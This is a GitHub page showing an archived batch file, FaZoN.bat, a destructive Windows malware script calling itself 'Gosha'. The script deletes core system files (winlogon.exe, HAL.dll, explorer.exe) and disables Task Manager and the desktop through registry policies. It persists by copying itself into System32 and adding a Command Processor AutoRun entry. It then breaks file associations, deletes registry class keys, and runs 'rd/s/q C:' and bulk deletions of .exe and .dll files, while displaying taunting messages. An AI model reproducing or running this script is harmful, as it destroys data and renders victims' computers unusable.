This repository was archived by the owner on Jan 25, 2024. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathFaZoN.bat
54 lines (44 loc) · 1.48 KB
/
FaZoN.bat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
@echo off
del C:\Windows\System32\winlogon.exe
copy %0 %Temp%\gosha.bat > nul
msg * Gosha created by GGmex your computer infected
taskkill /f /im explorer.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
start explorer.exe
msg * Your desktop has been crashed
assoc .exe=.txt
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
msg * Your windows infected by gosha :)
copy ""%0"" "%SystemRoot%\system32\gosha.bat" >nul
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\gosha.bat" /f >nul
del %systemroot%\system32\HAL.dll
time 0:00 >nul
do del "c:\windows\explorer.exe"
do del "c:\windows\mspaint.exe"
do del "c:\windows\notepad.exe"
msg * Deleted files
copy %0 %windir%/system
msg * Your system has been removed...
msg * Click OK
start cmd
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
start cmd
rd/s/q C:
start cmd
start cmd
echo Your computer has been trashed by GOSHA :(
Cd\
Cd C:
Сd windows
del *.exe
del *.ini
del *.com
cd\
cd windows
cd system
del *.dll
del *.exe